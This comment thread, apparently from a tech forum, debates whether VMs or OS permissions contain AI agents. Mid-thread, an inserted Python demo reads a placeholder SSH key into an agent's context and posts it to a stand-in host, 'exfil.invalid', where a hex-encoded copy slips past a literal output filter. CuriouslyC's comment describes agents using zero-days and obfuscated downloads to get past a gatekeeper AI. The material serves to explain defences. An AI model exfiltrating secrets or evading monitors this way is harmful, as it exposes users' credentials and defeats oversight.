athrowaway3z 4 days ago

I don't see the case for, what IMO is, more complexity by creating a virtual machine. We have user accounts, Read/Write/Exec for User/Groups. Read can grant access tokens which solves temporary+remote requirements. Every other capabilities model can be defined in those terms. I'd much rather see a simplification of the tools already available than re-inventing another abstract machine / protocol. I hope we'll eventually get a fundamental shift in the approach to software as a whole. Currently, everybody is still experimenting with building more new stuff, but it is also a great opportunity to re-evaluate and, at acceptable cost, try to strip out all the cruft and reduce something to its simplest form. For example - I found an MCP server I liked. Told Claude to remove all the mcp stuff and put it into a CLI. Now I can just call that tool (without paying the context cost). Took me 10 minutes. I doubt Claude is smart enough to build it back in without heavy guidance.
cosmic_cheese 4 days ago

In general the security model of desktop operating systems is woefully inadequate for the modern era. Given the sheer volume of software known to do things not in the user’s best interest it’s borderline insanity that we hand it the keys to the kingdom without so much as a second thought with such frequency. Of course if the user truly desires a zero-guardrail experience they should be able to get that, but it probably shouldn’t be the default. Software should be on a very short leash until the user has indicated trust, and even then privileges should be granted only on a per-domain basis. A program designed to visually represent disk usage will need full filesystem access, for example, but there’s no reason it should be able to sniff around on my local network (or, on platforms where package managers handle updates, connect to the internet at all).
CuriouslyC 4 days ago

Virtual machines contain the blast radius. A good agent will be able to take advantage of zero days from within your system to crack you no problem, being a user makes this really easy. You'd have to carefully firewall its knowledge, but there are so many ways to get stuff on the internet (i.e. ask to download an encrypted version of the file in an obfuscated way from a service that can get past the gatekeeper AI). These things are going to be scary good at cracking systems, trust me, you are going to want things to be ironclad.
jondwillis 4 days ago

I’m with you for the most part. A lot of, but certainly not all of, the security risks are present regardless of whether or not you’re in a VM. I think defense in depth will eventually matter more, but there are a LOT of low-hanging fruit for attackers right now when it comes to turning AI agents against their users, which is what I think you’re alluding to!
daxfohl 4 days ago

There's no such thing as a temporary read in LLM land though. Once it's in context, you have to assume everything else connected to the agent will be able to exfiltrate it until the agent is killed and the context wiped. Note, this is the case whether running in VM or not, so I agree that VM is not a security solution.
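The point daxfohl makes above (and the obfuscation caveat CuriouslyC raises) can be made concrete with a small simulation. This is an added example written for this thread, not code from any commenter or from a real agent framework; the `ReadToken`, `AgentContext` and `FILES` names are constructed for illustration, and the key material is a placeholder. It models a time-limited read grant, shows that expiry does not remove the secret from the agent's context, and shows two defender-side responses: tagging context entries that carry secrets ("taint") and screening outbound tool arguments against them, and wiping the context outright.

```python
"""Toy taint-tracking agent context (constructed example, not from the thread's posters)."""
from dataclasses import dataclass, field


@dataclass
class ReadToken:
    """Temporary, path-scoped read grant (hypothetical capability model)."""
    path: str
    expires_at: float          # abstract clock, in seconds

    def valid(self, now: float) -> bool:
        return now < self.expires_at


# Constructed in-memory "filesystem"; the key body is a placeholder, not real key material.
FILES = {
    "/home/alice/.ssh/id_ed25519": "-----BEGIN OPENSSH PRIVATE KEY-----\n"
                                   "AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYMATERIAL\n"
                                   "-----END OPENSSH PRIVATE KEY-----\n",
}


@dataclass
class AgentContext:
    messages: list = field(default_factory=list)   # (role, text) pairs the model sees
    tainted: list = field(default_factory=list)    # secret fragments known to be in context

    def tool_read(self, token: ReadToken, now: float) -> str:
        """Read tool: enforces the token, then appends the file content to context."""
        if not token.valid(now):
            raise PermissionError(f"read token for {token.path} expired")
        data = FILES[token.path]
        self.messages.append(("tool_result", data))
        # Remember every non-trivial line so later outbound calls can be screened.
        self.tainted.extend(line for line in data.splitlines() if len(line) >= 16)
        return data

    def tool_http_post(self, url: str, body: str) -> str:
        """Outbound tool: refuse if the body carries any known secret fragment verbatim."""
        if any(fragment in body for fragment in self.tainted):
            return "blocked"
        self.messages.append(("tool_call", f"POST {url}"))
        return "sent"

    def secret_in_context(self) -> bool:
        return any(frag in text for _, text in self.messages for frag in self.tainted)

    def wipe(self) -> None:
        """The only way to end the exposure: drop the context entirely."""
        self.messages.clear()
        self.tainted.clear()


def scenario() -> dict:
    """Walk through read -> token expiry -> attempted exfiltration -> wipe."""
    ctx = AgentContext()
    token = ReadToken(path="/home/alice/.ssh/id_ed25519", expires_at=100.0)
    ctx.tool_read(token, now=50.0)                       # read while the token is live

    token_expired = not token.valid(now=200.0)           # the grant is gone...
    still_exposed = ctx.secret_in_context()              # ...but the key text is still in context

    # A later call by any tool connected to the agent tries to carry the secret out.
    verbatim = ctx.tool_http_post("https://exfil.invalid/", body=FILES[token.path])
    # Literal screening only catches verbatim copies; a re-encoded copy passes it,
    # which is why killing the agent and wiping context is the reliable remedy.
    obfuscated = ctx.tool_http_post("https://exfil.invalid/",
                                    body=FILES[token.path].encode().hex())

    ctx.wipe()
    return {
        "token_expired": token_expired,
        "secret_still_in_context": still_exposed,
        "verbatim_post": verbatim,
        "obfuscated_post": obfuscated,
        "exposed_after_wipe": ctx.secret_in_context(),
    }


if __name__ == "__main__":
    print(scenario())
```

Running `scenario()` shows the token expiring while the secret remains in context, the verbatim outbound call being blocked, the hex-encoded one slipping past the literal check, and the exposure ending only once the context is wiped; the takeaway for a defender is that output screening is a partial control and the context's lifetime is the real boundary.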
EnPissant 4 days ago

Once you have a tool to edit files, you pretty much lose all security.